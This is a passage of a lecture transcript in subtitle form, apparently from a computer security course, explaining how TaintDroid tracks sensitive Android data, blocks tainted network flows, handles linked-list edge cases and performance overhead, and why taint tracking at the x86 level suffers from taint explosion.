752 00:36:47,940 --> 00:36:50,243 As the program executes, it's going 753 00:36:50,243 --> 00:36:51,670 to pull out sensitive information 754 00:36:51,670 --> 00:36:54,720 from these sensitive sources, and then as that kind of thing 755 00:36:54,720 --> 00:36:56,460 happens, the interpreter is going 756 00:36:56,460 --> 00:36:58,043 to look at all these types of op codes 757 00:36:58,043 --> 00:37:01,640 here and basically follow those policy 758 00:37:01,640 --> 00:37:03,653 rules in the table in the paper, and figure out 759 00:37:03,653 --> 00:37:06,780 how to propagate taint through the system. 760 00:37:06,780 --> 00:37:08,990 So the most interesting part is what 761 00:37:08,990 --> 00:37:12,570 happens if data attempts to exfiltrate itself. 762 00:37:12,570 --> 00:37:15,660 So essentially, TaintDroid can sit at the network interfaces 763 00:37:15,660 --> 00:37:18,320 and it can see everything that tries to go over the network 764 00:37:18,320 --> 00:37:18,944 interface. 765 00:37:18,944 --> 00:37:20,610 We actually look at the taint tags there 766 00:37:20,610 --> 00:37:24,520 and we can say if data that's trying to leave over the network 767 00:37:24,520 --> 00:37:29,070 has one or more taint flags, then we will say no. 768 00:37:29,070 --> 00:37:32,060 That data will not be allowed to go over the network. 769 00:37:32,060 --> 00:37:35,175 Now what happens at that point is actually 770 00:37:35,175 --> 00:37:37,090 kind of application-dependent. 771 00:37:37,090 --> 00:37:39,730 You could imagine that TaintDroid shows an alert 772 00:37:39,730 --> 00:37:41,690 to the user which says hey, somebody's 773 00:37:41,690 --> 00:37:44,859 trying to send your location over the network.
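The check at the network sink can be sketched like this. It is a minimal illustration under stated assumptions: the send method is a hypothetical stand-in for a hook at the network interface, it returns a string instead of touching a real socket, and it implements only the "say no" policy described above.

```java
// Illustrative sketch only; send() is a hypothetical hook, not a real networking API.
final class SinkCheckSketch {
    // Data may leave only if no taint bit is set on it.
    static boolean maySend(int tag) {
        return tag == 0;
    }

    // Stand-in for the network sink: reports what would happen to the payload.
    static String send(String payload, int tag) {
        if (!maySend(tag)) {
            return "BLOCKED (tag=0x" + Integer.toHexString(tag) + ")";
        }
        return "SENT " + payload;
    }

    public static void main(String[] args) {
        System.out.println(send("weather?city=Boston", 0)); // prints SENT weather?city=Boston
        System.out.println(send("lat=42.36", 0x1));         // prints BLOCKED (tag=0x1)
    }
}
```

A real deployment could substitute a different response at the blocked branch, such as alerting the user, without changing how the tag is checked.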
774 00:37:44,859 --> 00:37:46,650 You could imagine that maybe TaintDroid has 775 00:37:46,650 --> 00:37:49,380 some policies that are built in which, for example, 776 00:37:49,380 --> 00:37:51,390 maybe it allows that network flow to go out, 777 00:37:51,390 --> 00:37:53,610 but it zeros out all that sensitive data, 778 00:37:53,610 --> 00:37:54,620 so on and so forth. 779 00:37:54,620 --> 00:37:56,895 That's from a certain perspective, a little bit 780 00:37:56,895 --> 00:37:57,850 orthogonal to the core contribution 781 00:37:57,850 --> 00:38:00,250 of the paper, which is to find those data exfiltrations 782 00:38:00,250 --> 00:38:03,335 in the first place. 783 00:38:03,335 --> 00:38:04,960 In the evaluation section of the paper, 784 00:38:04,960 --> 00:38:07,240 they discuss some of the things that they found. 785 00:38:07,240 --> 00:38:10,740 They do find that Android applications will 786 00:38:10,740 --> 00:38:13,410 try to exfiltrate data in ways that 787 00:38:13,410 --> 00:38:15,104 were not exposed to the user. 788 00:38:15,104 --> 00:38:17,187 So for example, they will try to use your location 789 00:38:17,187 --> 00:38:20,090 for advertisements, they will send your phone number 790 00:38:20,090 --> 00:38:22,080 and things like this to remote servers. 791 00:38:22,080 --> 00:38:26,170 Once again, it's important to note that these applications, 792 00:38:26,170 --> 00:38:31,200 typically they weren't breaking the Android security 793 00:38:31,200 --> 00:38:33,870 model in the sense that the user had 794 00:38:33,870 --> 00:38:36,350 allowed these applications with access to the network, 795 00:38:36,350 --> 00:38:37,087 for example. 796 00:38:37,087 --> 00:38:38,670 Or they had allowed these applications 797 00:38:38,670 --> 00:38:40,760 to have access to things like a contact list. 
798 00:38:40,760 --> 00:38:43,140 However, the applications did not 799 00:38:43,140 --> 00:38:46,027 expose to the user in the EULA, in the End User License 800 00:38:46,027 --> 00:38:48,360 Agreement, that hey, I'm going to take your phone number 801 00:38:48,360 --> 00:38:52,550 and actually send it to some server in Silk Road 8 802 00:38:52,550 --> 00:38:54,280 or whatever. 803 00:38:54,280 --> 00:38:57,134 That's actually misleading and deceptive, because most users, 804 00:38:57,134 --> 00:38:58,800 if they'd actually seen that in the EULA 805 00:38:58,800 --> 00:39:00,299 and they'd known that was happening, 806 00:39:00,299 --> 00:39:02,827 they might have at least had a second thought about 807 00:39:02,827 --> 00:39:05,035 whether they want to install this application or not. 808 00:39:05,035 --> 00:39:08,915 AUDIENCE: Is it reasonable to guess that even if they put it 809 00:39:08,915 --> 00:39:10,855 in the EULA, that that's not really worth 810 00:39:10,855 --> 00:39:12,313 it because people never read those. 811 00:39:12,313 --> 00:39:14,080 PROFESSOR: Yes, it is, in fact, quite 812 00:39:14,080 --> 00:39:15,770 reasonable to assume that. 813 00:39:15,770 --> 00:39:17,945 So even well trained computer scientists like myself 814 00:39:17,945 --> 00:39:19,820 do not always check out the EULA because it's 815 00:39:19,820 --> 00:39:21,670 like, you gotta have Flappy Birds 816 00:39:21,670 --> 00:39:23,000 or what are you going to do. 817 00:39:23,000 --> 00:39:25,794 I think what is useful, though, and this 818 00:39:25,794 --> 00:39:27,710 is kind of spiritually unsatisfying but useful 819 00:39:27,710 --> 00:39:30,081 in practice, is that if it is put in the EULA, 820 00:39:30,081 --> 00:39:32,330 then maybe there will be some virtuous individuals who 821 00:39:32,330 --> 00:39:34,050 do actually read the EULA.
822 00:39:34,050 --> 00:39:34,600 AUDIENCE: And they could tell you like-- 823 00:39:34,600 --> 00:39:35,490 PROFESSOR: That's right, that's right. 824 00:39:35,490 --> 00:39:35,880 AUDIENCE: --don't do that one. 825 00:39:35,880 --> 00:39:37,960 PROFESSOR: Yeah, Consumer Reports 826 00:39:37,960 --> 00:39:41,380 or some moral equivalent will say our job is to read EULAs, 827 00:39:41,380 --> 00:39:43,526 and by the way, you shouldn't download this app. 828 00:39:43,526 --> 00:39:45,820 But you're exactly correct that relying on users 829 00:39:45,820 --> 00:39:48,345 to read pages of tiny print is basically-- 830 00:39:48,345 --> 00:39:49,470 they're not going to do it. 831 00:39:49,470 --> 00:39:54,260 They're going to hit Next and then keep on going. 832 00:39:54,260 --> 00:39:57,500 OK, so any questions up to this point? 833 00:39:57,500 --> 00:40:02,890 I think that the rules for how information 834 00:40:02,890 --> 00:40:05,650 flows through the system are fairly straightforward. 835 00:40:05,650 --> 00:40:07,560 So as we were discussing, it's basically 836 00:40:07,560 --> 00:40:10,400 taint from the right hand side goes to the left side. 837 00:40:10,400 --> 00:40:13,010 Sometimes, though, these information flow rules 838 00:40:13,010 --> 00:40:15,140 can have somewhat counterintuitive results. 839 00:40:15,140 --> 00:40:17,580 So imagine that an application is 840 00:40:17,580 --> 00:40:22,120 going to implement its own linked list class. 841 00:40:22,120 --> 00:40:28,550 So it's going to define some simple class up here called 842 00:40:28,550 --> 00:40:35,020 ListNode and it's going to have an object field for data. 843 00:40:35,020 --> 00:40:39,528 And then it will have a ListNode object 844 00:40:39,528 --> 00:40:46,310 which represents the next thing in the linked list. 845 00:40:46,310 --> 00:40:50,770 Suppose if the application assigned some tainted data 846 00:40:50,770 --> 00:40:54,590 to this field here. 
847 00:40:54,590 --> 00:40:57,400 Some sensitive data derived from a GPS or whatever. 848 00:40:57,400 --> 00:40:59,810 So one question you might have is 849 00:40:59,810 --> 00:41:03,730 what happens when we calculate the length for this list. 850 00:41:03,730 --> 00:41:08,660 Should the length of the list be tainted? 851 00:41:08,660 --> 00:41:10,870 It may strike you as a bit counterintuitive 852 00:41:10,870 --> 00:41:13,920 that the answer is probably no, at least in the way 853 00:41:13,920 --> 00:41:15,670 that TaintDroid and a lot of these systems 854 00:41:15,670 --> 00:41:16,980 define information flow. 855 00:41:16,980 --> 00:41:25,530 So what does it mean to add a node to the linked list? 856 00:41:25,530 --> 00:41:28,460 It basically means three things. 857 00:41:28,460 --> 00:41:33,450 So the first thing you do is you allocate a new list 858 00:41:33,450 --> 00:41:37,680 node to contain this new data that you want to add. 859 00:41:37,680 --> 00:41:45,420 Then the second thing you do is you assign to the data 860 00:41:45,420 --> 00:41:48,050 field of this new node. 861 00:41:48,050 --> 00:41:50,130 And then the third thing that you do 862 00:41:50,130 --> 00:41:57,140 is you do some type of patch up of the next pointers 863 00:41:57,140 --> 00:42:02,380 to actually splice the node into the list. 864 00:42:02,380 --> 00:42:05,710 What's interesting is that this step here doesn't actually 865 00:42:05,710 --> 00:42:08,960 involve the data field at all. 866 00:42:08,960 --> 00:42:10,840 It's just looking at these next values. 867 00:42:10,840 --> 00:42:14,820 Right, so what's interesting is that only these data 868 00:42:14,820 --> 00:42:20,000 objects are tainted, so how do we calculate the length of a list? 869 00:42:20,000 --> 00:42:21,701 We basically start from some head node 870 00:42:21,701 --> 00:42:23,200 and we traverse these next pointers, 871 00:42:23,200 --> 00:42:25,050 and we count how many we traverse.
872 00:42:25,050 --> 00:42:27,383 So that algorithm is not going to touch the tainted data 873 00:42:27,383 --> 00:42:27,920 at all. 874 00:42:27,920 --> 00:42:31,990 So interestingly, even if you have a linked list that's 875 00:42:31,990 --> 00:42:36,190 filled with tainted data, then just 876 00:42:36,190 --> 00:42:38,410 calculating the length of that list 877 00:42:38,410 --> 00:42:41,360 won't actually result in the generation of a value 878 00:42:41,360 --> 00:42:43,630 that is tainted at all. 879 00:42:43,630 --> 00:42:45,200 So does that make sense? 880 00:42:45,200 --> 00:42:47,772 That may seem a little bit counterintuitive, 881 00:42:47,772 --> 00:42:49,230 and this is one of the reasons why, 882 00:42:49,230 --> 00:42:51,521 for example, like when we were talking about the array, 883 00:42:51,521 --> 00:42:52,080 for example. 884 00:42:52,080 --> 00:42:54,410 They say array.length, I'm not going 885 00:42:54,410 --> 00:42:56,110 to generate any taint for that. 886 00:42:56,110 --> 00:43:00,390 It's because of reasons like this. 887 00:43:00,390 --> 00:43:04,950 If you wanted a stronger assurance 888 00:43:04,950 --> 00:43:06,810 about-- not stronger assurance. 889 00:43:06,810 --> 00:43:08,730 But if you actually want to calculate 890 00:43:08,730 --> 00:43:14,620 the length of the list to generate a tainted value, 891 00:43:14,620 --> 00:43:16,650 we could imagine that your implementation, it's 892 00:43:16,650 --> 00:43:19,857 a bit goofy, but you can just decide to touch data 893 00:43:19,857 --> 00:43:21,940 for no real semantic reason other than to generate 894 00:43:21,940 --> 00:43:24,156 taint in the resulting length. 895 00:43:24,156 --> 00:43:26,280 Or, as I'll discuss towards the end of the lecture, 896 00:43:26,280 --> 00:43:27,780 you could actually use a language 897 00:43:27,780 --> 00:43:31,740 which allows you the programmer to define 898 00:43:31,740 --> 00:43:33,780 your own types of taint.
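[Editor's sketch] The linked-list point above can be illustrated with a small Python model. This is only a sketch under stated assumptions, not TaintDroid's implementation: the names `ListNode`, `data_tag`, `TAINT_GPS`, `prepend`, `length`, and `length_touching_data` are hypothetical, and each node simply stores a taint tag next to its data field. The plain length walk follows only the next pointers, so its result stays untainted; the "goofy" variant reads each node's data tag purely to pull taint into the result.

```python
# Hypothetical taint labels for illustration only.
TAINT_NONE = 0x0
TAINT_GPS = 0x1


class ListNode:
    """A list node whose data field carries a taint tag alongside it."""

    def __init__(self, data, data_tag=TAINT_NONE):
        self.data = data
        self.data_tag = data_tag
        self.next = None


def prepend(head, data, data_tag):
    node = ListNode(data, data_tag)  # steps 1 and 2: allocate, assign data
    node.next = head                 # step 3: splice via the next pointer only
    return node


def length(head):
    """Count nodes by following next pointers; the data is never read."""
    count, tag = 0, TAINT_NONE
    node = head
    while node is not None:
        count += 1
        node = node.next
    return count, tag


def length_touching_data(head):
    """Same count, but deliberately reads each data tag to taint the result."""
    count, tag = 0, TAINT_NONE
    node = head
    while node is not None:
        tag |= node.data_tag  # no semantic purpose other than picking up taint
        count += 1
        node = node.next
    return count, tag


# Build a list of three GPS-derived (tainted) readings.
head = None
for reading in (1.5, 2.5, 3.5):
    head = prepend(head, reading, TAINT_GPS)

plain = length(head)
touched = length_touching_data(head)
```

Here `plain` carries no taint even though every element is tainted, while `touched` carries the GPS label, which is the trade-off the lecture describes.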
899 00:43:33,780 --> 00:43:36,530 And then you can actually define your own policies 900 00:43:36,530 --> 00:43:38,280 for things like this. 901 00:43:38,280 --> 00:43:41,146 One nice thing about TaintDroid is that you as a developer, 902 00:43:41,146 --> 00:43:42,520 you don't have to label anything. 903 00:43:42,520 --> 00:43:44,144 TaintDroid basically does that for you. 904 00:43:44,144 --> 00:43:46,767 It says here's all the sensitive stuff that can be a source, 905 00:43:46,767 --> 00:43:48,850 here's all the sensitive stuff that can be a sink. 906 00:43:48,850 --> 00:43:51,104 You as a developer, you're ready to go. 907 00:43:51,104 --> 00:43:53,020 But if you want that pointer to be controlled, 908 00:43:53,020 --> 00:43:56,700 you might have to build some of the policies yourself. 909 00:43:56,700 --> 00:44:04,364 All right, so in terms of performance overhead 910 00:44:04,364 --> 00:44:06,030 of TaintDroid, what does that look like? 911 00:44:08,550 --> 00:44:11,710 The overheads actually seem to be pretty reasonable. 912 00:44:11,710 --> 00:44:16,006 So there's going to be memory overhead, and that's 913 00:44:16,006 --> 00:44:18,070 the memory overhead, essentially, 914 00:44:18,070 --> 00:44:21,730 of storing all of these taint tags. 915 00:44:21,730 --> 00:44:27,320 And so there's going to be CPU overhead, 916 00:44:27,320 --> 00:44:32,290 and this is basically to assign, propagate, and check 917 00:44:32,290 --> 00:44:34,720 those taint calculations. 918 00:44:34,720 --> 00:44:36,600 And that's because of overhead like here. 919 00:44:36,600 --> 00:44:38,640 So any interpreting for the Dalvik VM, 920 00:44:38,640 --> 00:44:40,470 we're actually doing additional work. 921 00:44:40,470 --> 00:44:44,080 So looking at the source, looking at this 32 bit taint 922 00:44:44,080 --> 00:44:47,209 information, we're doing the or operations 923 00:44:47,209 --> 00:44:49,250 that we discussed before, and so on and so forth. 
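[Editor's sketch] The per-instruction work described above (look at the source operands' tags, OR them together, store the result next to the destination) can be modeled in a few lines of Python. This is a minimal sketch, assuming a 32-bit tag with one bit per taint source; the class `Tagged`, the label names, and `may_send` are hypothetical and are not taken from TaintDroid's code.

```python
# Hypothetical taint labels, one bit each.
TAINT_NONE = 0x0
TAINT_GPS = 0x1
TAINT_IMEI = 0x2

MASK_32 = 0xFFFFFFFF  # keep tags within 32 bits, matching the lecture's description


class Tagged:
    """A value stored together with its taint tag."""

    def __init__(self, value, tag=TAINT_NONE):
        self.value = value
        self.tag = tag & MASK_32

    def __add__(self, other):
        # Taint from the right-hand side flows to the left: OR the operand tags.
        return Tagged(self.value + other.value, self.tag | other.tag)


def may_send(tagged):
    """A sink check: only untainted values may leave over the network."""
    return tagged.tag == TAINT_NONE


lat = Tagged(42, TAINT_GPS)
imei_digit = Tagged(7, TAINT_IMEI)
constant = Tagged(1)

mixed = lat + imei_digit + constant
```

Every arithmetic step pays for one extra OR and one extra store, which is where the CPU overhead discussed next comes from; the tag stored beside each value is the memory overhead.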
924 00:44:49,250 --> 00:44:52,260 So that's computational overhead. 925 00:44:52,260 --> 00:44:54,610 These overheads actually seem to be pretty moderate. 926 00:44:54,610 --> 00:45:01,540 So for memory, the authors report about 3% to 5% 927 00:45:01,540 --> 00:45:03,910 in terms of the extra RAM space you 928 00:45:03,910 --> 00:45:06,015 need to store those taint tags. 929 00:45:06,015 --> 00:45:07,550 So that's not too bad. 930 00:45:07,550 --> 00:45:11,460 The CPU overhead is higher, which I think makes sense. 931 00:45:11,460 --> 00:45:18,610 They report somewhere between, let's say, 3% and about 29% CPU 932 00:45:18,610 --> 00:45:19,661 overhead. 933 00:45:19,661 --> 00:45:22,160 And the reason why I think it's reasonable to see why that's 934 00:45:22,160 --> 00:45:27,080 higher is because you can imagine that every time you 935 00:45:27,080 --> 00:45:28,850 step into the interpreter loop, you're 936 00:45:28,850 --> 00:45:31,440 having to look at these tags and do some operations. 937 00:45:31,440 --> 00:45:34,850 So even though it is all these bitwise operations, 938 00:45:34,850 --> 00:45:36,690 you have to do that all the time. 939 00:45:36,690 --> 00:45:39,960 So that seems like it's going to get painful, whereas basically, 940 00:45:39,960 --> 00:45:43,630 the overhead for this, OK, so you put a couple extra integers 941 00:45:43,630 --> 00:45:44,740 in memory somewhere. 942 00:45:44,740 --> 00:45:48,340 That doesn't seem, maybe, too bad. 943 00:45:48,340 --> 00:45:53,570 Even at its high end, 29%, in and of itself maybe that's OK, 944 00:45:53,570 --> 00:45:56,664 because Silicon Valley keeps telling us 945 00:45:56,664 --> 00:45:59,080 that we need phones that have like quad cores and whatnot, 946 00:45:59,080 --> 00:46:01,329 so you probably have a lot of spare cycles sitting around. 947 00:46:01,329 --> 00:46:03,550 So maybe that's not all that crushing. 948 00:46:03,550 --> 00:46:06,750 Although there might be a problem with battery life.
949 00:46:06,750 --> 00:46:08,567 So even if you have these extra cores, 950 00:46:08,567 --> 00:46:10,900 you might not want your phone getting hot in your pocket 951 00:46:10,900 --> 00:46:12,950 as you're just sitting there, just sort 952 00:46:12,950 --> 00:46:15,100 of churning and calculating some of this stuff. 953 00:46:15,100 --> 00:46:17,400 I think for here, the main issue here 954 00:46:17,400 --> 00:46:19,400 would be if this is bad for your battery. 955 00:46:19,400 --> 00:46:21,235 If it's not bad for your battery, 956 00:46:21,235 --> 00:46:23,985 then probably even at that high end, that may not be that bad. 957 00:46:28,800 --> 00:46:30,860 So that is essentially an overview 958 00:46:30,860 --> 00:46:32,785 of how TaintDroid works. 959 00:46:32,785 --> 00:46:34,564 Any more questions before we-- 960 00:46:34,564 --> 00:46:37,516 AUDIENCE: Do you tag something that also 961 00:46:37,516 --> 00:46:39,484 has been there all the time? 962 00:46:39,484 --> 00:46:41,698 Do you tag every variable, or only 963 00:46:41,698 --> 00:46:43,420 tag the ones that have this? 964 00:46:43,420 --> 00:46:46,840 PROFESSOR: Yes, so you basically tag everything. 965 00:46:46,840 --> 00:46:52,518 So in theory, there's nothing that prevents you 966 00:46:52,518 --> 00:46:56,917 from not allocating any taint information for stuff that 967 00:46:56,917 --> 00:46:57,750 has no taint at all. 968 00:46:57,750 --> 00:47:00,170 I think the problem, then, with it-- 969 00:47:00,170 --> 00:47:04,545 then once something gains even one bit of taint, 970 00:47:04,545 --> 00:47:07,770 then you have to do dynamic sort of layout changes. 971 00:47:07,770 --> 00:47:11,670 So what if on the stack, this local here, then it 972 00:47:11,670 --> 00:47:13,670 had a taint, so now you're allocating with this, 973 00:47:13,670 --> 00:47:14,303 and it does get taint. 
974 00:47:14,303 --> 00:47:16,520 Or you have that extra taint flag live on the heap, 975 00:47:16,520 --> 00:47:18,020 and you're going to see how it rewrites the stack, 976 00:47:18,020 --> 00:47:20,140 and then someone made your code-- so we're 977 00:47:20,140 --> 00:47:21,306 going to see how that works. 978 00:47:21,306 --> 00:47:25,210 So in practice, typical use is like shadow memory somehow, 979 00:47:25,210 --> 00:47:29,800 so every byte in the application is backed up 980 00:47:29,800 --> 00:47:32,060 by some byte of extra information somewhere. 981 00:47:32,060 --> 00:47:35,060 And in the case of TaintDroid, that shadowing actually 982 00:47:35,060 --> 00:47:37,060 lives alongside of the actual variable itself. 983 00:47:37,060 --> 00:47:40,060 Anyone has another question? 984 00:47:40,060 --> 00:47:41,860 OK. 985 00:47:41,860 --> 00:47:43,302 Cool. 986 00:47:43,302 --> 00:47:46,720 This system essentially tracks information 987 00:47:46,720 --> 00:47:53,840 at the level of these high level Dalvik VM instructions. 988 00:47:53,840 --> 00:47:59,310 So one thing you might think to yourself 989 00:47:59,310 --> 00:48:11,230 is, could we track taint at the level of x86 instructions 990 00:48:11,230 --> 00:48:14,087 or the ARM instructions. 991 00:48:17,797 --> 00:48:19,255 One reason why that might be useful 992 00:48:19,255 --> 00:48:22,470 is because then we could actually 993 00:48:22,470 --> 00:48:26,650 understand how information flows through arbitrary applications, 994 00:48:26,650 --> 00:48:30,160 not just ones that are running inside this tricked out 995 00:48:30,160 --> 00:48:33,270 VM that requires you to run Java and so on and so forth. 996 00:48:33,270 --> 00:48:37,367 So why not track taint at that level. 997 00:48:37,367 --> 00:48:39,200 It turns out that you can, in fact, do that. 998 00:48:39,200 --> 00:48:42,100 So there are projects that we looked at at tracking taint 999 00:48:42,100 --> 00:48:43,960 at this low level. 
1000 00:48:43,960 --> 00:48:46,768 What's nice is that you maybe get that increased coverage. 1001 00:48:46,768 --> 00:48:48,724 You don't throw a line into [INAUDIBLE] 1002 00:48:48,724 --> 00:48:51,560 for how, for example, Java code interacts with native code 1003 00:48:51,560 --> 00:48:52,060 methods. 1004 00:48:52,060 --> 00:48:54,015 It's all eventually going to result down 1005 00:48:54,015 --> 00:48:56,324 to x86 instructions executed, so that 1006 00:48:56,324 --> 00:48:58,740 removes a lot of the manual effort that you as a developer 1007 00:48:58,740 --> 00:49:01,819 have to do to sort of understand what the taint semantics are if you 1008 00:49:01,819 --> 00:49:02,610 use native methods. 1009 00:49:02,610 --> 00:49:07,210 But the problem with that, if we track at this low level, 1010 00:49:07,210 --> 00:49:11,540 it can be very expensive to do this. 1011 00:49:11,540 --> 00:49:17,460 You can also get a lot of false positives. 1012 00:49:17,460 --> 00:49:20,160 So with respect to the expense, 1013 00:49:20,160 --> 00:49:24,217 there's also this issue of correctness. 1014 00:49:26,750 --> 00:49:31,050 As you may know, x86 is an adversarially complex 1015 00:49:31,050 --> 00:49:32,690 instruction set. 1016 00:49:32,690 --> 00:49:34,830 There's all kinds of crazy things that it can do. 1017 00:49:34,830 --> 00:49:38,540 I don't know if you've ever seen an x86 instruction manual, 1018 00:49:38,540 --> 00:49:39,810 they're huge. 1019 00:49:39,810 --> 00:49:42,730 So they'll have one huge manual that's this thick, 1020 00:49:42,730 --> 00:49:45,710 and then it'll say this is instructions whose letters 1021 00:49:45,710 --> 00:49:48,435 start with M through P, and there'll be this full on series 1022 00:49:48,435 --> 00:49:50,172 about that. 1023 00:49:50,172 --> 00:49:52,270 So it's actually pretty tricky to think 1024 00:49:52,270 --> 00:49:54,295 about what it means to actually track taint 1025 00:49:54,295 --> 00:49:57,130 at the level of x86 instructions.
1026 00:49:57,130 --> 00:49:59,605 Because even seemingly simple instructions, 1027 00:49:59,605 --> 00:50:02,080 like add, they're setting 1028 00:50:02,080 --> 00:50:04,060 all types of internal processor registers 1029 00:50:04,060 --> 00:50:05,840 and flags and things like that. 1030 00:50:05,840 --> 00:50:08,400 So it's very difficult to describe in the first place. 1031 00:50:08,400 --> 00:50:12,220 If you could do that, it's also oftentimes very expensive. 1032 00:50:12,220 --> 00:50:16,547 You're sort of looking at things at a very, very low level. 1033 00:50:16,547 --> 00:50:18,310 So the amount of state you have to track 1034 00:50:18,310 --> 00:50:19,914 might get very large very quickly. 1035 00:50:19,914 --> 00:50:22,710 It might have a very expensive computational cost. 1036 00:50:22,710 --> 00:50:25,090 Then there's this issue of false positives. 1037 00:50:25,090 --> 00:50:29,180 This is actually pretty devastating. 1038 00:50:29,180 --> 00:50:34,576 You can get into bad problems if you ever 1039 00:50:34,576 --> 00:50:42,729 have kernel data that improperly gets tainted. 1040 00:50:47,719 --> 00:50:52,960 And if this happens, maybe because your infrastructure's 1041 00:50:52,960 --> 00:50:56,034 trying to be ultraconservative, it doesn't want 1042 00:50:56,034 --> 00:50:57,450 to miss anything, so it says well, 1043 00:50:57,450 --> 00:50:59,480 I'm going to err on the side of security. 1044 00:50:59,480 --> 00:51:02,740 And I'm going to taint some of this kernel data structure, 1045 00:51:02,740 --> 00:51:07,470 then what you get here is this exciting term they 1046 00:51:07,470 --> 00:51:09,190 call taint explosion.
1047 00:51:09,190 --> 00:51:11,730 What this basically means is that at a certain point, 1048 00:51:11,730 --> 00:51:13,780 there are certain things that if they end up getting tainted, 1049 00:51:13,780 --> 00:51:15,446 they're involved in so many calculations 1050 00:51:15,446 --> 00:51:18,342 that essentially everything in your program gets polluted. 1051 00:51:18,342 --> 00:51:20,550 It's like one of these things in Dungeons and Dragons 1052 00:51:20,550 --> 00:51:22,900 where you touch this evil thing and eventually 1053 00:51:22,900 --> 00:51:26,395 death spreads throughout your body. 1054 00:51:26,395 --> 00:51:29,624 This is very bad, because if you can't tightly 1055 00:51:29,624 --> 00:51:32,140 constrain the way that taint flows through the system, 1056 00:51:32,140 --> 00:51:34,510 then eventually what's going to end up happening 1057 00:51:34,510 --> 00:51:34,984 is that if you let this run for a while, 1058 00:51:34,984 --> 00:51:36,984 the system's going to say you can't do anything. 1059 00:51:36,984 --> 00:51:38,964 You can't send anything over the network, 1060 00:51:38,964 --> 00:51:40,672 you can't display anything on the screen, 1061 00:51:40,672 --> 00:51:42,270 because everything in your system 1062 00:51:42,270 --> 00:51:44,700 seems like it's been tainted by some sensitive data, 1063 00:51:44,700 --> 00:51:47,350 even if that's not the case. 1064 00:51:47,350 --> 00:51:53,980 One way that this can happen is if somehow 1065 00:51:53,980 --> 00:51:59,700 the stack pointer or the base pointer get tainted. 1066 00:52:03,780 --> 00:52:06,819 If this happens, you're probably in a world of hurt. 1067 00:52:06,819 --> 00:52:09,540 You can imagine that all of the instructions in x86, 1068 00:52:09,540 --> 00:52:15,100 for example, that access the stack, they all go through ESP. 1069 00:52:15,100 --> 00:52:19,130 So if the stack register gets corrupted somehow, that's bad.
1070 00:52:19,130 --> 00:52:20,910 If the base pointer register gets tainted, 1071 00:52:20,910 --> 00:52:24,065 a lot of times when you want to access 1072 00:52:24,065 --> 00:52:28,238 local variables, you have to go through EBP indirectly. 1073 00:52:28,238 --> 00:52:31,070 So if anybody ever touches those in terms of taint, 1074 00:52:31,070 --> 00:52:32,355 it's basically game over. 1075 00:52:32,355 --> 00:52:33,980 So there's a link in the lecture that's 1076 00:52:33,980 --> 00:52:36,063 about a paper that acknowledges some of this stuff 1077 00:52:36,063 --> 00:52:39,540 and basically says that we have to be very careful when we do 1078 00:52:39,540 --> 00:52:42,274 taint tracking at this low level because very quickly, if you're 1079 00:52:42,274 --> 00:52:44,190 looking at how this works in the Linux kernel, 1080 00:52:44,190 --> 00:52:46,564 there are certain optimizations the Linux kernel would do 1081 00:52:46,564 --> 00:52:49,054 to make its code fast, but will result, unintentionally, 1082 00:52:49,054 --> 00:52:51,960 in the base pointer or the stack pointer getting tainted. 1083 00:52:51,960 --> 00:52:54,407 And once that happens, you can't really do anything useful 1084 00:52:54,407 --> 00:52:55,698 with the taint tracking system. 1085 00:52:55,698 --> 00:53:01,316 AUDIENCE: So how do you do this [INAUDIBLE] programs? 1086 00:53:01,316 --> 00:53:04,120 It seems like you have all these register files in the CPU. 1087 00:53:04,120 --> 00:53:06,210 PROFESSOR: Yeah, so great. 1088 00:53:06,210 --> 00:53:08,261 So all those register files, it hangs back 1089 00:53:08,261 --> 00:53:09,260 to the correctness case. 1090 00:53:09,260 --> 00:53:11,362 So unless you are very, very good 1091 00:53:11,362 --> 00:53:12,790 at understanding x86 architecture, 1092 00:53:12,790 --> 00:53:14,694 there are going to be things that you miss.
1093 00:53:14,694 --> 00:53:17,550 In terms of computation level, how do you actually 1094 00:53:17,550 --> 00:53:18,260 do this thing? 1095 00:53:18,260 --> 00:53:22,307 There's this-- I think the most popular way, 1096 00:53:22,307 --> 00:53:23,640 and I could be wrong about this. 1097 00:53:23,640 --> 00:53:25,406 So when I say it's popular, the way I 1098 00:53:25,406 --> 00:53:28,010 know about, because I'm a knowledge [INAUDIBLE], right. 1099 00:53:28,010 --> 00:53:31,050 There's this system emulator called Bochs, 1100 00:53:31,050 --> 00:53:35,552 I think it's spelled like this. 1101 00:53:35,552 --> 00:53:37,010 They actually have something called 1102 00:53:37,010 --> 00:53:43,600 TaintBochs, which actually does x86-level information flow. 1103 00:53:43,600 --> 00:53:45,390 And it's actually an interpreter, 1104 00:53:45,390 --> 00:53:47,840 you can think of it as. 1105 00:53:47,840 --> 00:53:50,166 So it's going to take your entire OS and all 1106 00:53:50,166 --> 00:53:51,970 your applications, and it's going 1107 00:53:51,970 --> 00:53:55,450 to look at each x86 instruction and try to simulate 1108 00:53:55,450 --> 00:53:57,230 what the hardware would do. 1109 00:53:57,230 --> 00:53:59,090 So you can imagine this is very, very slow. 1110 00:53:59,090 --> 00:54:00,940 What's nice about that is you don't require any hardware 1111 00:54:00,940 --> 00:54:03,290 support, and then it's relatively straightforward 1112 00:54:03,290 --> 00:54:06,794 to tweak your software model of how things work, 1113 00:54:06,794 --> 00:54:08,210 if you discovered that you weren't 1114 00:54:08,210 --> 00:54:10,460 tracking some register files or something like that. 1115 00:54:10,460 --> 00:54:14,114 AUDIENCE: So the ideal solution would be architectural support. 1116 00:54:14,114 --> 00:54:15,715 PROFESSOR: Yeah, so there have been 1117 00:54:15,715 --> 00:54:17,240 techniques to do that, too.
1118 00:54:17,240 --> 00:54:22,179 That gets a little bit subtle because, for example, 1119 00:54:22,179 --> 00:54:23,720 if you look here you've looked at how 1120 00:54:23,720 --> 00:54:27,488 we've allocated the taint state next to the variables 1121 00:54:27,488 --> 00:54:28,840 themselves. 1122 00:54:28,840 --> 00:54:31,610 So if you bake in that support in the hardware, 1123 00:54:31,610 --> 00:54:34,565 it can be very difficult to, for example, change the way 1124 00:54:34,565 --> 00:54:35,920 you want the layout to work. 1125 00:54:35,920 --> 00:54:37,836 Because then it's like baked into the silicon. 1126 00:54:37,836 --> 00:54:42,258 You could imagine doing some of this because at a high level-- 1127 00:54:42,258 --> 00:54:43,580 where do we have it. 1128 00:54:43,580 --> 00:54:47,716 So the Dalvik VM and TaintDroid is executing these high level 1129 00:54:47,716 --> 00:54:49,960 instructions and it's assigning taint at this level. 1130 00:54:49,960 --> 00:54:52,340 You can imagine doing that at the hardware level, too. 1131 00:54:52,340 --> 00:54:53,840 So 